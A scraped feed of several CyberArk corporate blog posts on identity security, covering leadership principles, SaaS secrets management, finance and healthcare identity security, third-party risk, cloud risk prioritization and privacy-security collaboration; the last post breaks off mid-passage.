In addition to the right level of privilege controls, intelligently applied, you can help improve your organization’s identity-focused security by embracing the principles of authenticity, logic and empathy. These foundational elements, inspired by insights from the Harvard Business Review, are crucial for building a resilient trust framework. By embracing these principles, you can present identity security as more than a technical solution. Instead, it becomes a strategic narrative that strengthens trust with stakeholders and users, ensuring comprehensive protection for all business operations.

Leadership in cybersecurity goes beyond managing security practices and incorporates human skills that build trust, anticipate risks and assure user-centric security. A leader’s job is to conduct the organization’s mindset when dealing with cybersecurity. With that in mind, the abovementioned three principles will help develop credibility, make educated decisions, and connect security processes with user needs.

Let’s explore the three principles that help in building trust in your cybersecurity program:

1. Authenticity: Building Credibility Through Consistent Behavior

Authenticity in cybersecurity leadership means acting as your organization’s genuine protector and strategic advisor. It involves transparent communication about the security posture, proactive sharing of risks and defenses and a visible commitment to the organization’s best interests. Authentic leaders build credibility and trust, which are essential for effective leadership in times of crisis.

2. Logic: Making Informed Decisions

Logical decision-making is crucial in cybersecurity. This principle involves data and analytics to understand threats and plan effective countermeasures. It would be best if you validated your strategies through evidence, enhancing your authority to earn the trust of stakeholders in the decisions you make to prioritize security initiatives. For Instance, cyberthreat intelligence provides valuable insights into imminent threats, attack patterns and vulnerabilities, equipping you to make informed decisions based on the world context around the organization. This way, you can ensure that your strategy is proactive, relevant and risk-based in addressing a never-ending evolution of the threat landscape.

3. Empathy: Aligning Security with User Needs

Empathy in leadership involves recognizing and addressing user concerns about security measures. As an empathetic leader, you should ensure that security protocols do not overburden users and that these measures align with the everyday experiences and expectations of those they aim to protect. This approach promotes user engagement and compliance, which are integral to a successful security strategy.

Securing Identity: Authentic, Logical, Empathetic Trust Building

Now that I’ve laid out these leadership principles, weaving them into everyday practice is necessary.  For example, identity security can effectively help the perception that our digital environment is safeguarded by ensuring that online transactions qualify users’ access through strong authentication methods and that their sessions are monitored continuously (Zero Trust). Finally, as important as the technology and processes is the need to understand the user’s need to promote the right level of security without interfering in their daily work.

Perception is as crucial as reality when it comes to honesty – it’s vital to be truthful and recognized as such. In other words, our stakeholders and end users should clearly understand why certain controls are necessary and how data is secured to make it easier for users to accept and follow the designed security practices. For instance, strong identity security is critical for defending against unwanted access and ensuring that only legitimate individuals may access sensitive data and systems. Techniques such as multi-factor authentication (MFA), biometric verification and behavioral analytics are essential components of a solid identity security strategy that you should incorporate into your plan to develop and maintain trust.

Fostering Confidence with Proactive Security: The Zero Trust Paradigm

Building trust through Zero Trust may seem contradictory at first. However, in essence, a Zero Trust strategy advocates giving the appropriate amount of trust for the right task at the right time. It eliminates implicit trust and implements security measures to prevent privilege abuse and security breaches.

Adopting a Zero Trust approach means assuming that no entity inside or outside the infrastructure is inherently trusted. This approach complements the principles of:

  • Authenticity – by enforcing consistent verification, showcasing a transparent security commitment.
  • Logic – by systematically applying strict access controls based on continuous assessment of risks and behaviors.
  • Empathy – by ensuring security measures do not impede user productivity or experience.

Empowering Leaders: Advancing Zero Trust with Identity Security

Anyone who follows a leader follows because they have faith in their ability to make the best decisions for them. Using Zero Trust, the defensible strategy is to initiate through identity security, which is the center of the “trust but always verify” approach.

Enhancing Authenticity Through Biometrics and MFA

Biometric authentication and MFA strengthen authenticity by proving the organization’s dedication to protecting identity at every access point. These technologies make the security process visible and understandable to users, enhancing trust in the measures implemented.

Supporting Logical Decision-Making with AI and Analytics

Artificial intelligence (AI) and analytics can assess risks in real time and adjust security measures dynamically. This technology application supports logical leadership by making more efficient and effective data-driven decisions, showcasing a commitment to sophisticated, reasoned security practices.

Empathy through User-Centric Security Designs

Security designs that consider user convenience, such as adaptive authentication methods that adjust security based on behavior and risk, show empathy. These designs reflect that the organization values user experience alongside security, fostering trust and cooperation from users.

Building Trust: Leadership and Zero Trust Synergy in Identity Security

Returning to my wife’s original question about stopping threat actors, the answer is that we need to be cautious online and promote a security culture that doesn’t get in the way of living our lives the way we want. It also exists in cyberspace. To achieve our goal, we must cultivate a risk-tolerant mindset that will empower us to make prudent, risk-aware decisions.

In today’s complex cybersecurity landscape, a security leader’s effectiveness centers not just on the security technologies you deploy but significantly on the trust you build. By adhering to authenticity, logic and empathy and integrating sophisticated identity security measures within a Zero Trust framework, you can ensure your organization is protected and trusted by all stakeholders.

Claudio Neiva is CyberArk’s Security Strategic Advisor, Director (LATAM). 

]]>
Cloud Migration Simplified: SaaS Secrets and PAM Strategy https://www.cyberark.com/blog/cloud-migration-simplified-saas-secrets-and-pam-strategy/ Fri, 21 Jun 2024 12:45:10 +0000 https://www.cyberark.com/?p=192858 Feature image for blog titled, "Cloud Migration Simplified: SaaS Secrets and PAM Strategy." Image is an abstract depiction of a compass and a map beneath a cloud with a lock embedded in it.

In the era of rapid digital transformation, organizations are prioritizing cloud transformation projects to enhance their operational agility, scalability and cost efficiency. However, this shift takes time and brings significant challenges, particularly in security and identity management. As businesses strive to innovate and keep pace with the competitive landscape, they often accumulate cyber debt – the buildup of security liabilities and risk debt due to delayed software maintenance or outdated security enhancements.

Many large organizations maintain a combination of cloud and traditional infrastructure because they cannot easily migrate or replace certain on-premises infrastructure and applications with cloud-native or SaaS solutions without incurring significant costs or risks to the business. So, a phased migration is the best way to address the complexities and risks associated with cloud transformation.

Cloud Transformation Security Challenges

The CyberArk 2024 Identity Security Threat Landscape Report highlights several critical security challenges associated with digital transformation and the migration to the cloud, focusing on managing and securing identities, particularly machine identities. Key findings and issues identified in the report include:

Digital Transformation and Identity-Related Attacks

  • Top source of attacks: Digital transformation is identified as the leading source of identity-related attacks, presenting significant security challenges for organizations transitioning to cloud environments.
  • Increased attack surface: Cloud migrations expand the attack surface, creating more entry points for potential attacks and making it harder to secure all aspects effectively.

Privileged Machine Identities

  • Prevalence of privileged access: 68% of respondents indicate that most of their machine identities have privileged access. These identities, encompassing applications, services and automated processes, require high-level permissions to operate.
  • Risk of unauthorized access: Privileged machine identities are attractive targets for attackers due to their access to sensitive data and critical systems. Compromise of these identities can result in severe security breaches.

Growth of Machine Identities

  • Machine identities: Leading the surge in identity security needs, driven by the proliferation of automation and microservices in cloud environments.

Operational and Compliance Challenges

  • Operational risks: Inadequate management of secrets and access credentials across diverse cloud environments can lead to inconsistent security policies and weak access controls, increasing the likelihood of security incidents.
  • Compliance challenges: Ensuring compliance with various regulatory requirements is complex in a cloud environment. Organizations must implement effective monitoring, auditing and reporting mechanisms to meet these obligations.

A Phased Cloud Migration Path

Most machine identities have privileged access, and the number of these non-human identities is only growing as automation, AI, cloud and other productivity enhancements become even more widely used. Since machine identities are closely associated with newer technology, it makes sense to start migrating your machine identity security to a centralized SaaS secrets management solution that integrates with your privileged access management (PAM) self-hosted solution and uses the credentials you already manage.

Organizations face increased operational risks and compliance challenges without proper management of machine identities. The complexity of managing secrets across diverse environments can lead to inconsistent security policies, weak access controls and an increased likelihood of security incidents.

Taking a phased approach and starting with SaaS secrets management offers a streamlined and centralized way to manage identities for humans and machines across cloud-native applications, multi-cloud environments and on-premises systems without disrupting your PAM self-hosted solution. This approach provides several key benefits that can significantly alleviate the burden of cyber debt:

  1. Centralized administration and automation: SaaS secrets management platforms provide a unified interface for managing secrets that integrate with your PAM self-hosted solution, simplifying administration and reducing human error risk. Automation capabilities regularly rotate and update secrets for long-standing accounts and use dynamic secrets for ephemeral accounts to minimize the risk of compromised credentials.​​
  2. Enhanced security and compliance: By centralizing secrets management, organizations can enforce consistent security policies and gain comprehensive visibility into how secrets are used and accessed – e
  3. Scalability and flexibility: SaaS solutions scale with an organization’s needs and accommodate the dynamic nature of cloud environments by design. They support a wide range of integrations with cloud platforms, DevOps tools and CI/CD pipelines, enabling security to be seamlessly embedded into development workflows without hindering productivity​​.
  4. Reduced complexity and cost: Managing secrets in a multi-cloud environment can be complex and costly. SaaS secrets management solutions reduce these complexities by providing a cloud-agnostic approach that avoids vendor lock-in and enables organizations to manage secrets uniformly across cloud services and on-premises systems​​.

Best Practices for SaaS Secrets Management Integration

When implementing a SaaS secrets management solution, organizations should consider the following best practices:

  • Comprehensive discovery and onboarding of cloud vaults: Conduct a thorough discovery of all existing secrets and credentials across the and machine identities. Onboarding these secrets into the SaaS platform should be a structured and phased approach to ensure minimal disruption. Security teams need comprehensive visibility and insights into the organization’s secrets stores managed by the cloud service providers (e.g., AWS Secrets Manager (ASM) and Azure Key Vault).
  • Policy-driven access control: Implement fine-grained access controls based on the principle of least privilege. Use policy-driven frameworks to define and enforce who can access specific secrets and under what conditions.
  • Integration with existing solutions: Ensure the secrets management solution integrates seamlessly with your existing PAM solution (self-hosted or SaaS), DevOps and security tools. This enables automated workflows and continuous security without adding friction to development processes.
  • Continuous monitoring and auditing: Use the SaaS platform’s monitoring and auditing capabilities to gain insights into secret usage. Continuous auditing helps identify anomalies and potential security threats, enabling timely interventions.

By addressing these challenges through strategic approaches and advanced security solutions, organizations can better secure their cloud environments against identity-related threats and ensure a more secure digital transformation.

Starting Your SaaS Journey with Secrets Management

As organizations strive to innovate and remain competitive, the accumulation of cyber debt poses significant risks. SaaS secrets management offers a powerful solution to these challenges, providing centralized, scalable and secure management of secrets across diverse environments. By taking a phased approach and adopting SaaS secrets management, organizations can reduce their cyber debt, enhance security and achieve their cloud transformation goals more efficiently while positioning the organization to adapt to future challenges with confidence and resilience.

cyber debt is critical in the cloud transformation journey. Ensure identity security is at the forefront of your software development with insights from the new “Identity Security for Software Development” book by O’Reilly Media and CyberArk. This early-release eBook collaboration offers a blend of theory and practice to protect against the risks of cyber debt in our evolving digital landscape. And be sure to check out our upcoming webinar, “How to Build a Developer-First Cloud Security Program,” on July 9, where I’ll be previewing content from the book.

John Walsh is a senior product marketing manager at CyberArk.

]]>
Financial Highwire: The Critical Role of Identity Security in Finance https://www.cyberark.com/blog/financial-highwire-the-critical-role-of-identity-security-in-finance/ Tue, 18 Jun 2024 20:32:28 +0000 https://www.cyberark.com/?p=192797 Graphic of man on tightrope

In the highwire act of the financial services sector, identity security serves as the essential safety net, meticulously engineered to intercept any missteps before they precipitate a fall. Just as a tightrope walker relies on a safety net for confidence at dizzying heights, financial institutions – from global companies and insurers to community banks and credit unions – navigate a complex array of risks. They trust in identity security to maintain balance and confidence amid the intricacies of digital banking transactions and financial data exchanges.

Identity Security in Today’s Financial Sector

As the tightrope of digital finance stretches further, carrying more data and transactions than ever, the need for an unshakeable safety net becomes paramount, as 93% of organizations faced two or more identity-related breaches in the past year. This net doesn’t just catch falls; it instills the confidence to push forward, innovate and engage with customers securely and effectively.

A Strategic Framework for Strengthened Identity Security

To ensure the financial sector’s safety net is both resilient and responsive, consider these six foundational elements to enhance identity security and future-proof against growing cyber risks:

  1. Dynamic access management. Fine-tune your safety net by ensuring that only the right entities have access at the right times. This requires balancing user convenience and stringent security measures to prevent unauthorized access.
  2. Intelligent privilege controls. Strengthen the fibers of your net with smart controls for protecting IT administrators, for example, by also introducing a zero standing privileges approach to access management. Tightly controlling access privileges minimizes the risk of breaches while allowing your team the flexibility to perform their roles effectively.
  3. Unified identity orchestration. Weave a stronger net by integrating and managing all identity processes from a central point. This can help catch discrepancies and potential threats before they can cause harm.
  4. Proactive threat detection. Equip your safety net with sensors that can feel the slightest tremor of threat, allowing immediate action. Continuous monitoring and real time analysis are crucial to swiftly detecting and mitigating threats.
  5. Comprehensive identity mapping. Make every part of your safety net visible and accounted for by mapping out all human and machine identities. Knowing who and what is on your network is crucial for maintaining security.
  6. Adaptive authentication. Modify the tension in your net according to the conditions with context-sensitive, adaptive multi-factor authentication (MFA) that responds dynamically to varying threat levels, enhancing security without compromising the user experience.

Beyond Compliance: Elevating the Safety Standards

While compliance like SWIFT CSCF, Sarbanes-Oxley (SOX), 23 NYCRR 500 and DORA provide a regulatory framework for setting up the safety net, true security leadership in the global financial sector involves cooperation to weave a net that’s ahead of the curve – anticipating risks and reinforcing points of vulnerability before they are tested.

For cybersecurity professionals in finance, this is your moment to ensure that the safety net you create is compliant and a cutting-edge model for others to follow. By embedding these six strategic pillars into your identity security practices, you protect assets and build a culture of security-first thinking across the organization.

A Confident Approach to Financial Identity Security

Embrace this holistic approach to identity security to ensure your financial operations can perform confidently on the highwire of modern finance. By strengthening your own company’s safety net, you protect not only your data and transactions but also the trust and confidence of your customers. Implement these strategies to stay agile and secure in a world where the stakes are as high as the rewards.

Let’s consider Rabobank’s experience to illustrate these concepts in action. With automated password management, privileged access and activity monitoring for 10 million customers across 48 countries and 59,000 employees, Rabobank International has significantly reduced risk and established a transparent overview of accountability.

As the landscape of financial security continues to evolve, establishing robust identity security protocols is a necessity and a strategic advantage. By adopting these principles, your organization can not only navigate the challenges of today but also pave the way for a secure and prosperous future in the digital age.

Chris Maroun is a senior director in CyberArk’s field technology office.

]]>
CIO POV: Building Resilience in a Complex Threat Landscape https://www.cyberark.com/blog/cio-pov-building-resilience-in-a-complex-threat-landscape/ Wed, 12 Jun 2024 16:07:34 +0000 https://www.cyberark.com/?p=192452 Complex Threat Landscape

As a CIO, I often wish for a world where the threat landscape is less expansive and complicated than it is today. Unfortunately, the reality is quite different. This month, I find myself particularly focused on the idea that our digital business would come to a grinding halt without the technology ecosystem that supports it. However, this very ecosystem also presents significant risks.

This month, I’m thinking quite a bit about issues that pertain to the intricate web of potential vulnerabilities our collective digital ecosystem faces. The digital ecosystem brings several advantages, such as shifting the heavy lifting of the back-end infrastructure to a SaaS vendor, getting a best-in-class solution that you couldn’t develop yourself, and helping us focus on our mission-critical domains. The same digital ecosystem also presents imminent downsides. The threats posed by your third-party providers are compounded by the risks their providers (your fourth parties) present. This creates an intricate, ever-expanding web of potential vulnerabilities. Each new technology brings additional layers of partners and added risks. Additionally, increasing cyber debt and persistent threats like ransomware are constant concerns.

New Technologies: Uncovering the Hidden Risks and Blind Spots

As we navigate the complexities of our digital ecosystem, it becomes increasingly apparent that the innovations we embrace can also introduce new vulnerabilities. These are not just hypothetical risks; they are the tangible issues we’ve touched upon earlier, manifesting as third and fourth-party risks, cyber debt and the persistent threat of ransomware.

In the spirit of addressing these challenges head-on, let’s further examine the specific areas that demand our vigilant focus:

1. Chain Reaction Risks in Your Digital System

If you’re already losing sleep over cybersecurity, you can be sure to lose even more over the risks your partner’s partners present. The deepening relationships with technology partners enable our digital businesses, but every new provider you integrate into your ecosystem exponentially increases your risk.

I’m confident that every third-party provider you onboard is vetted for risks. But do you apply the same scrutiny to your fourth parties (your third-party providers’ providers)? How many third- and fourth-party providers is your organization actively working with? Let me share some insights.

CyberArk’s 2024 Identity Security Threat Landscape Report indicates that 84% of organizations expect to employ three or more cloud service providers (CSPs), consistent with 85% last year. Moreover, our respondents anticipate an 89% increase in the number of software-as-a-service (SaaS) providers in the next 12 months, up from 67% in the 2023 report. Consider the footprint of your digital ecosystem. Your extended family of third-party providers includes service providers, integrators, hardware and infrastructure suppliers, business partners, distributors, resellers and telecommunications providers. External to your organization, these entities are crucial for enabling your digital business.

Do you have visibility into all your third-party providers’ security practices? What about your fourth-party providers? Does your organization actively measure and mitigate the risks posed by your third- and fourth-party providers? It’s implied in these questions, but I’ll say it anyway: you should be doing all these things.

2. Cyber Debt is Real

You’ve probably heard of tech debt, which results from prioritizing speed to market over a robust and agile technology environment. In today’s landscape, tech debt is amplified by cyber debt. Consider the accumulated risks and vulnerabilities within your IT infrastructure due to neglected updates, lack of tools, or too many disparate tools, coupled with a shortage of skilled cybersecurity staff. It’s a recipe for disaster, and cybercriminals thrive on it.

The proof is in our survey findings. Breaches due to phishing and vishing attacks have impacted nine out of ten organizations. Nearly the same number of organizations were targeted by ransomware in 2024 (90%) as in 2023 (89%), with an increasing number reporting irretrievable data loss. With bad actors utilizing generative artificial intelligence (GenAI) to scale sophisticated attacks, we should anticipate that every organization will be breached in the coming years. This is a reality every CISO must brace for.

3. Ransomware is Still a Thing

Ransomware remains a significant threat, with no honor among thieves. Despite our hopes for a world free of ransomware, the truth is that old threats are enduring, and humans are the weakest link. Ransomware will continue to grow in volume and sophistication, especially with AI-enabled deepfakes. No amount of cybersecurity awareness training can completely prevent a user from clicking a malicious link or sharing a one-time password (OTP), compromising their identity and the organization’s data.

The damage caused by ransomware is severe. Our findings reveal that 75% of organizations impacted by ransomware paid the ransom but did not recover their data. However, protecting against ransomware doesn’t have to be as challenging as climbing Mount Everest. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) offers several no-cost resources to help you proactively protect your organization against ransomware. I highly recommend taking advantage of these resources

Building a Resilient Digital Defense Against Emerging Threats

Although a day in the life of a CISO may seem grim, it’s not all doom and gloom. My peers in the industry will agree that we successfully protect against threats frequently, but a single breach can leave a lasting mark. I advise everyone to thoroughly review their IT environments, scrutinizing gaps and prioritizing remediation. This process needs to be ongoing and methodical, performed at regular intervals.

While we must anticipate and mitigate the risks of new technologies like GenAI, we cannot ignore the persistent threats of traditional vulnerabilities. Simplistically, I recommend three actions:

1. Audit and evaluate all legacy and new technologies across your environment. You must conduct an annual vendor assessment, which evaluates and prioritizes the critical vendors that might pose a high risk for your business. You can use specific tools for external security scoring and put specific liability phrases in the contracts. You should also ensure that access to your systems includes secure authentication and that the exposed data is only what is required.

2. Assess the risks these disparate tools pose versus the time and effort required to maintain them. I recommend a dedicated cadence for discussing cyber risk management and reviewing outcomes, including a toolset to reduce third-party risks.

3. Create a plan to consolidate your technology stack based on the right balance for your organization. Proceed slowly but surely. As a CIO, I can confidently say that the platformization movement is real. It’s not just a way to reduce overall costs but also a means to mitigate third-party risks. If you have a trusted vendor that you’re continuously reassessing from a cyber risk perspective, it will eventually get you to a more secure posture. Just don’t put all your eggs in one basket.

I am already implementing these strategies. Are you?

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

]]>
Securing a Lifeline: Why Identity Security is Paramount in Healthcare https://www.cyberark.com/blog/securing-a-lifeline-why-identity-security-is-paramount-in-healthcare/ Thu, 06 Jun 2024 18:42:52 +0000 https://www.cyberark.com/?p=191886 Graphic with various healthcare elements and locks

In the intricate healthcare ecosystem, cybersecurity is akin to the human immune system – a vital defense that safeguards the body from external and internal threats. Healthcare cybersecurity is essential for protecting patient data, ensuring medical service availability and maintaining compliance across the medical industry. The future of healthcare is increasingly digital, and its security depends on the strength of identity security measures. Identity security is the defense against data breaches and unauthorized access. By ensuring that only the right person has the right access at the right time, identity security helps secure data and empowers healthcare providers.

Graphic with quote

The Heart of Healthcare Cybersecurity: Identity Security

Identity security is a vital defense mechanism, like how the immune system protects the human body. It ensures appropriate access for authorized personnel through various safeguards, crucial for protecting against cyberthreats in an industry vulnerable due to its high-value data and extensive IT reliance. It plays a fundamental role in tackling challenges, ensuring the system’s overall health and integrity through the following essential functions:

  1. Establishing Patient Trust
    Patient trust in the healthcare industry is arguably as vital as a healthy heart in a living body. What isn’t arguable, however, is the need to guard sensitive health information precisely and carefully. Identity security plays a crucial role by tightly controlling access to sensitive data, thereby helping preserve the confidentiality, integrity and availability of patient information. This secure management is critical for maintaining patient trust and compliance with stringent regulations like HIPAA.
  2. Enhancing Operational Efficiency
    Just as the circulatory system efficiently delivers blood to where it’s needed most, identity security solutions streamline healthcare authentication and authorization processes. These solutions ensure that healthcare providers have timely yet secure access to crucial patient information, optimizing workflows while guarding against unauthorized access.
  3. Supporting Innovative Technologies
    As new technologies such as generative AI, telehealth and electronic health records expand the healthcare landscape, they also introduce new vulnerabilities. Identity security acts like a selective barrier, allowing beneficial innovations while protecting against potential threats. This balance supports innovation and safeguards the system’s integrity.

Identity Security Strategies for Healthcare Providers

In the dynamic and ever-expanding healthcare field, the cybersecurity landscape is fraught with challenges that can impede safe and effective patient care. Identity security addresses these challenges by fortifying the infrastructure that handles sensitive patient information. Identity security responds to immediate threats and builds resilience by anticipating and neutralizing potential vulnerabilities through the following actions:

  • Securing sensitive data through measures such as multi-factor authentication (MFA), encryption and access management. As digital health data proliferates, so does the need to protect it against unauthorized access and breaches.
  • Maintaining regulatory compliance by enforcing compliant policies and avoiding penalties and legal complications. A complex web of regulations regarding data protection binds healthcare providers to protect patient privacy.
  • Mitigating insider threats by monitoring and managing user access and data usage within the organization. Like a body’s cells turning against it, insider threats can be as damaging as external attacks – identity security can significantly reduce the risk of insider misconduct.

By addressing these challenges, identity security protects against immediate threats and strengthens the healthcare system’s ability to adapt to new technologies and evolving threats, ensuring long-term health and resilience. This proactive approach is vital to maintaining a secure and trustworthy environment where healthcare providers can focus on delivering the highest quality patient care.

Safeguarding the Future: Identity Security in Healthcare

Cybersecurity leaders and healthcare stakeholders increasingly recognize that identity security is crucial. It acts as the immune system of the digital healthcare organism, essential for maintaining operational health and enabling the safe adoption of innovations. As healthcare evolves, the commitment to strong identity security measures will be vital to delivering patient care that is both secure and progressive.

Discover how companies apply an identity security-first approach to implement Zero Trust and protect personal health information (PHI) for 1.8 million members.

Lee Godby is a business development director, and Brian Carpenter is a senior business development director at CyberArk.

]]>
Triage Your Cloud Security: Risk Prioritization Methods https://www.cyberark.com/blog/triage-your-cloud-security-risk-prioritization-methods/ Tue, 04 Jun 2024 14:12:35 +0000 https://www.cyberark.com/?p=191796 Triage Your Cloud Security: Risk Prioritization Methods

It’s a familiar post-disaster scene in seemingly every television medical drama. A ferry has crashed, or a train has derailed. Patients flood into the ER, each requiring urgent medical attention. The impossibly attractive medical staff must quickly assess and prioritize patients based on the severity of their injuries and the likelihood of survival. Someone with great hair likely says an inspiring quote and jumps immediately into action.

To carry the plot, the medical staff often struggles to make decisions under pressure, leading to confusion and delays in treatment. As the chaos intensifies, the absurdly well-lit ER becomes overwhelmed, with patients and their families increasingly anxious and frustrated. The risk of medical errors and adverse outcomes rises, further compounding the crisis. And then your favorite character probably gets killed off. All thanks to one element the writers left out of the scene: triage. Great TV – terrible medicine.

While the chaos of a TV trauma center may seem far removed from the world of cybersecurity, the concept of triage is just as relevant when it comes to prioritizing and addressing cyberthreats. Just as medical staff must quickly assess and prioritize patients based on the severity of their injuries, organizations must also assess and prioritize cyberthreats to maintain order, efficiency and safety in any environment. With a multitude of identities possessing varying levels of privilege and access, the challenge lies in effectively prioritizing security measures.

Defining Risk: A Common Lens

Before delving into the prioritization strategies, a quick note about establishing a common understanding of risk. Organizations may define risk differently, but in our experience mitigating identity-related threats, we define risk as a combination of three fundamental factors:

  1. Level of privilege refers to the type of privilege granted to an identity, ranging from read-only access to full administrative control, including the ability to modify other identities’ permissions.
  2. Scope of influence, also known as the blast radius, describes the extent to which an identity can access systems and resources. This can range from access to a single cloud-native service to multiple services with access to elastic workloads to full access to every resource and service.
  3. Ease of compromise refers to the level of difficulty for a malicious actor to compromise access. This includes the existence of technical vulnerabilities and the level of controls applied to protect the identity.

Building on this definition of risk, let’s examine two effective risk-based prioritization methods that can provide a framework for triaging your cloud security priorities.

Method No. 1: Security Control-Based Risk Prioritization

Our first method for triaging cloud security priorities is based on the understanding that not all organizations can deploy all security controls simultaneously. Therefore, priorities are determined by assessing the risk impact and the effort required for mitigation. In this approach, organizations implement security controls iteratively, focusing on specific control families. If we look back at the triage scene, this would be like simultaneously treating patients with similar injuries.

The recommended prioritization for this control-based method follows these steps:

  1. Progress toward zero standing privileges (ZSP). You can work toward achieving this by implementing role-based access, multi-factor authentication (MFA), session protection and audit functionalities. ZSP helps to ensure that users only have access to resources when needed and for the duration necessary to perform their tasks. Controls facilitating ZSP are prioritized to mitigate the sprawl of excessive access. This step will have the most significant impact on minimizing risk.
  2. Implement standing privileged access controls. This can be done through credential vaulting, password management, MFA and session monitoring. Prioritize root and registration account security, minimize freestanding access and use robust credential management for necessary cases. Continuously refine non-emergency account privileges to enforce least privilege.
  3. Deploy secrets management controls. This includes secrets vaulting, rotation, complex policies, removal of hard-coded secrets and just-in-time (JIT) delivery to applications. Focus on refining privileges for machine workloads and apply these controls to machine passwords and keys to mitigate credential theft and privilege abuse.
  4. Establish identity governance controls. Focus on lifecycle management and compliance mechanisms. Start by rolling out lifecycle management to IT admin roles, followed by developers and other privileged roles. Ensure roles are explicitly defined and implement identity compliance across all human users to certify and adjust access as needed periodically.

Method No. 2: Identity/Persona-Based Risk Prioritization

In contrast to security control-based prioritization, the second method for triaging cloud security priorities focuses on securing identities based on their roles or personas, assuming simultaneous application of all security control families. The ideal prioritization hierarchy, which would be akin to treating women and children first in our triage scenario, typically follows this sequence:

  1. Secure root and registration accounts. Start by securing high-privileged accounts, such as those with Global Administrator access, with measures like MFA.
  2. Prioritize IT administrators. Focus on roles with extensive administrative access across cloud service provider (CSP) accounts, as they have the potential for the most significant impact.
  3. Tailor security controls for developers and service administrators. Apply tailored security controls to individuals with privileged access to specific services or resources within CSPs.
  4. Address other application and audit teams. Secure users with lesser privileges, including read-only access.
  5. Safeguard machine workloads and cloud-native services. Protect automation and orchestration workloads, often with sensitive permissions, using secrets management and least privilege controls.

A Note on Regulatory Compliance

Regulatory compliance is a critical factor to consider when prioritizing security measures. Adhering to frameworks such as GDPR, HIPAA or SOC 2 is essential for ensuring data protection and privacy. To align your risk prioritization efforts with regulatory mandates, consider the following steps:

  1. Implement Data Protection Requirements. Take steps to safeguard sensitive data and comply with data protection regulations by implementing new or additional security controls.
  2. Establish Auditing and Reporting Mechanisms. Set up mechanisms for auditing and reporting to demonstrate compliance with regulatory requirements.
  3. Develop Incident Response Preparedness. Create incident response plans and procedures to address data breaches and security incidents in compliance with regulatory guidelines.

Streamlining Your Cloud Security Risk Prioritization

Just like in a TV medical drama, effective prioritization is essential when dealing with many threats, including cyberthreats. The coiffed chief of surgery has aligned the triage strategy with standard Hollywood hospital protocol. Each staff member has a clearly defined role; every patient is cared for when needed. Someone with great hair still probably says an inspiring quote.

By addressing the common challenges and considerations outlined in this blog, organizations can more effectively navigate the complexities of risk prioritization, enhance their cloud security posture and ensure compliance with regulatory mandates.

Effective risk prioritization requires a nuanced understanding of risk dynamics and a strategic, adaptive approach. Organizations can use a combination of security control-based and identity/persona-based approaches to enhance their resilience against evolving cyberthreats while optimizing resource allocation and effort.

The bottom line is that cutting the drama in your cloud security requires risk prioritization. A clear strategy and well-defined priorities can help maintain order, efficiency and safety in your cloud environment.

To dive deeper into cloud security fundamentals and learn how it plays into compliance, check out our whitepaper 2024 Playbook: Identity Security and Cloud Compliance.

Alyssa Miles is a product marketing manager at CyberArk.

]]>
Synchronized Swimming: The Relationship Between Privacy and Cybersecurity Teams https://www.cyberark.com/blog/synchronized-swimming-the-relationship-between-privacy-and-cybersecurity-teams/ Thu, 30 May 2024 16:49:07 +0000 https://www.cyberark.com/?p=191669 Synchronized Swimming: The Relationship Between Privacy and Cybersecurity Teams

Data theft, data protection and the leakage of passwords or secrets are the top two cloud security concerns for 2,400 cybersecurity experts, according to the recently released CyberArk 2024 Identity Security Threat Landscape Report. In an ever-brewing digital ecosystem of multi-cloud environments, countless on-prem and SaaS applications – and third-party and fourth-party providers, 94% of organizations report having faced at least one identity-related breach in the last 12 months. Nearly all (99%) of these victimized organizations report negative impacts on business, such as the cost of recovery and financial burden from lawsuits and regulatory fines.

Post-breach scenarios are often tense and scrutinized heavily by stakeholders, including auditors, boards of directors, customers and shareholders. In such a scenario, cybersecurity teams intensify their focus on remediation and containment of the attack. In contrast, privacy teams focus on understanding and limiting the extent of regulatory non-compliance, potential fines and customer impact. The impact of a breach extends beyond the cybersecurity teams to others, including privacy teams critical to defining data privacy requirements.

Yet, often, organizations make the mistake of carving individual swim lanes for the roles and responsibilities of cybersecurity vs. privacy teams. This approach is simply bad practice – I am convinced that privacy and cybersecurity should be on the same team, working in lockstep with one another, similar to synchronized swimmers.

At its best, synchronized swimming is not just a beautiful sight but a challenging sport that takes enormous effort and commitment to get right. Drawing on the concept of synchronization, it’s essential to understand that privacy and cybersecurity are not separate swim lanes with competitive goals; they are inseparable components of a perfectly synchronized swimming act. I think cybersecurity and privacy are much like the individual athletes committed to a group sport with a singular goal – securing sensitive data and maintaining confidentiality.

Let me explain how.

The Inseparable Bond Between Privacy and Cybersecurity Teams

Privacy and cybersecurity teams need to collaborate more to ensure the highest level of protection for their organizations’ sensitive assets. For example, the Chief Privacy Officer’s (CPO’s) team should ideally define a data collection, retention, storage and usage policy. The policy should address critical questions, including what organization is collecting the data, its purpose and intended use, the data processing location, the data retention duration and, most importantly, who is authorized to access it.

Only when this is defined can the Chief Information Security Officer (CISO) and their cybersecurity team ensure data is protected throughout its lifecycle, mainly when it’s in use, in flight and at rest in the appropriate geographical location as required by regulations.

Now, consider a situation where the CPO and CISO aren’t actively collaborating. We can assume that data or access to data is secured but not per the applicable (country and industry-related) privacy laws. Such conditions can lead to heavy non-compliance fines but not a data breach. For a robust cybersecurity and privacy program, privacy teams must classify the data sensitivity level by law so cybersecurity teams can apply security controls to protect it.

The CPO and CISO must collaborate regularly to consider the impact on confidentiality, integrity and availability of data and privacy. The industry interchangeably uses the words confidentiality and privacy, but they are different. Confidentiality can be enabled through agreements between two or more parties that limit data sharing by controlling access.

Ethical considerations can also play a role in limiting data sharing and enabling confidentiality. On the other hand, privacy is the right to freedom from intrusion into personal information. Adopting disparate tools or processes in a siloed manner will only increase gaps in maintaining the confidentiality and privacy of data. A synchronized approach wherein privacy teams classify data requirements and cybersecurity experts use this framework to secure data is the only proper approach to maintaining confidentiality and data privacy.

Cybersecurity Tools and PETs: A Comprehensive Approach to Data Protection

As a technology leader, I see a combination of cybersecurity tools and privacy-enhancing technologies (PETs) in today’s market. For example, data encryption in flight or at rest, data masking or obfuscation protects sensitive information in many ways. While cybersecurity capabilities have been around for a long time and continue to evolve, PETs are relatively new and aim to protect private data in a regulated landscape. Many PETs, like data security posture management (DSPM) as a part of cloud-native applications protection platform (CNAPP), already enable streamlined data security and privacy capabilities. Other PETs, like homomorphic encryption or confidential computing, are built to address specific use cases, such as maintaining data privacy.

